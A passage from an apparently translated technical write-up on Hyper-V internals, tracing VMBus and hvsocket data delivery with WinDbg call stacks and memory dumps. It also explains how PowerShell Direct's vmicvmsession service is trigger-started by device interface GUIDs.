<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 vmbusr!PkGetReceiveBuffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!PipeValidateAndGetReceiveBuffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!PipeForwardToValidPacket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!PipeTryReadOrPeekSingle</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!PipePeekMultiple</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!PipeProcessDeferredReadWrite</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!PipeProcessDeferredIosAndUnlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!PipeEvtChannelSignalArrived</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 vmbkmclr!KmclpVmbusManualIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 vmbusr!ParentRingInterruptDpc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!KiExecuteAllDpcs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!KiRetireDpcList</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!KiIdleLoop</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the same procedure Work Item is added to queue</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 NETIO!NetioInsertWorkQueue</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 hvsocket!VmbusTlQueueEndpointAction+0x14e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 hvsocket!VmbusTlDeliverDataIndications+0x6b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 hvsocket!VmbusTlXPartIndicateReceive+0x9b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!PipePeekMultiple+0xf3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!PipeProcessDeferredReadWrite+0x1b6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!PipeProcessDeferredIosAndUnlock+0x74</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!PipeEvtChannelSignalArrived+0x91</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 vmbkmclr!KmclpVmbusManualIsr+0x1d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 vmbusr!ParentRingInterruptDpc+0x62</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!KiExecuteAllDpcs+0x2b1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!KiRetireDpcList+0x5df</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!KiIdleLoop+0x5a</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further it is carried out, data are copied in the buffer allocated by hvsocket.sys, then transmitted to application through the same Fast I/O.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 hvsocket!VmbusTlIndicateReceive</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 hvsocket!VmbusTlConnectIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 hvsocket!VmbusTlXPartIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!IopfCompleteRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 hvsocket!VmbusTlFulfillReceiveRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 hvsocket!VmbusTlDeliverSingleDataIndicationList</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlDeliverDataIndications</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 hvsocket!VmbusTlEndpointActionWorkQueueRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 NETIO!NetiopIoWorkItemRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!KiStartSystemThread</span></div>
<br /><ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PowerShell Direct</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows PowerShell for a long time supports the PowerShell Remoting protocol which allows to be connected to workstations and servers on network for remote management and executing of any commands. PowerShell Remoting is described by Microsoft in the document [MS-PSRP] which is uploaded publicly within the Open Specifications program. PowerShell Direct uses the same protocol for the work, however the environment of delivery of data is not the network on the basis of TCP\IP of a stack, but VMBUS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PowerShell Direct uses the same cmdlets, as for PowerShell Remoting: Enter-PSSession, Invoke-PSSession and New-PSSession, only instead of a name of the computer enters a name of the virtual machine or its GUID. </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V PowerShell Direct Service was created for support of this technology in guest OS (a name of service - vmicvmsession), which functionality is realized in %SystemRoot library %\System32\ICSvc.dll. Start type - Manual (Trigger start). Under what conditions the service will be started?</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PS C:\Users\Administrator> sc.exe qtriggerinfo vmicvmsession</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[SC] QueryServiceConfig2 SUCCESS</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SERVICE_NAME: vmicvmsession</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> START SERVICE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> DEVICE INTERFACE ARRIVAL : </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">999e53d4-3d5c-4c3e-8779-bed06ec056e1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [INTERFACE CLASS GUID] - HV_GUID_VM_SESSION_SERVICE_ID</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It will occur if device with INTERFACE CLASS GUID</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> 999e53d4-3d5c-4c3e-8779-bed06ec056e1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> will be connected to system. Apparently, GUID of this device coincides with GUID of service from the section of the registry in root-OS (HKLM:\SOFTWARE\Microsoft \Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices) where for work with sockets 2 keys with GUID</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> 999e53d4-3d5c-4c3e-8779-bed06ec056e1 and a5201c21-2770-4c11-a68e-f182edb29220</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> are by default created.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In guest OS devices with such GUIDs are present at</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{999e53d4-3d5c-4c3e-8779-bed06ec056e1}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{a5201c21-2770-4c11-a68e-f182edb29220}\##?#ACPI#VMBus#0#{a5201c21-2770-4c11-a68e-f182edb29220}\#{a5201c21-2770-4c11-a68e-f182edb29220}-{00000000-0000-0000-0000-000000000000}-0000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="202" src="https://lh4.googleusercontent.com/dsYXXMFeoC1kSKY3QtqF7AlXvlEniMsM4SNtzP7LXqik5HfaEuTplfOlCqzM10RILtzwSDWHvB2AJg4jdm7M4inOh43oDIBhlJ2shFFiznhmeTQET1frE0Inp2nc0S5KeHpWFeQeN2Yvzv_QoA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The socket is initialized when one of mentioned cmdlets execution in root-OS, at the same time in guest OS the vmicvmsession service creates process of Powershell.exe and one Hyper-V a socket. The data transformed to a XML format are transferred by </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> socket calls encoded by Base64. The mechanism does not demand inclusion in options of the virtual machine and is available by default. Earlier to learn a work algorithm researchers decompiled the System.Management.Automation.dll module which is a part of Windows Powershell, now the situation became simpler, and source code can be found on github:</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/remoting/common/RemoteSessionHyperVSocket.cs)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Here it is possible to gather a lot of information, in particular, in what way to realize the own application for work with Hyper-V as sockets on C#.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's put the symbolical breakpoints:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> nt!PnpNotif * </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in guest OS and when executing Enter-PSSession we stop on nt!PnpNotifyDeviceClassChange.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PnpNotifyDeviceClassChange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!PnpDeviceEventWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!PspSystemThreadStartup</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM Session Service 1 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID is 2</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">nd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> parameter:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dd @rcx – 1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: super;">st</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> parameter some GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6c8 cb3a4004 11d046f0 60008fb0 3f051397 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6d8 00000002 00000000 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6e8 00000000 00000164 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dd @rdx – 2</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: super;">nd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d6f8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> 999e53d4 4c3e3d5c d0be7987 e156c06e </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> du @rdx+10 – on offset +10h - the ID device which appears on VMBUS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d708 "\??\ACPI#VMBus#0#{999e53d4-3d5c-"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d748 "4c3e-8779-bed06ec056e1}\{999e53d"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d788 "4-3d5c-4c3e-8779-bed06ec056e1}-{"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa806`a2b5d7c8 "00000000-0000-0000-0000-00000000"</span></div>
